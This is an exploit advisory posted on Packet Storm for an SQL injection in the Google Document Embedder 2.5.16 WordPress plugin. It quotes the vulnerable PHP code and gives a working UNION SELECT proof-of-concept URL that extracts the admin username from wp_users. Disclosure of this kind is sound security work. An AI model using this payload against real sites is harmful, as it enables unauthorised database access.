exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Document Embedder 2.5.16 SQL Injection

Google Document Embedder 2.5.16 SQL Injection
Posted Dec 4, 2014
Authored by Securely

Google Document Embedder version 2.5.16 suffers from a mysql_real_escape_string bypass SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | 087cee08975e4af001863f3fcbd05f44b7c3a9b20100ba060bae9baa8d04ac88
Download | Favorite | View

Google Document Embedder 2.5.16 SQL Injection

Change Mirror Download
Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip
 
1. Detail
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php
 
================================================================
50  // get profile
51  if ( isset( $_GET['gpid'] ) ) {
52      $gpid = mysql_real_escape_string( $_GET['gpid'] );
        //mysql_real_escape_string() is bypass
53      if ( $profile = gde_get_profile( $gpid ) ) {
54          $tb = $profile['tb_flags'];
55          $vw = $profile['vw_flags'];
56          $bg = $profile['vw_bgcolor'];
57          $css = $profile['vw_css'];
58      }
59  }
================================================================
 
===============================================================
373 function gde_get_profile( $id ) {
374 global $wpdb;
375 $table = $wpdb->prefix . 'gde_profiles';
376
377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE
 
profile_id = $id", ARRAY_A );
378 $profile = unserialize($profile[0]['profile_data']);
379
380 if ( is_array($profile) ) {
381     return $profile;
382 } else {
383     return false;
384 }
385 }
================================================================
 
2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1
 
3. Solution:
Not patched
 
4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close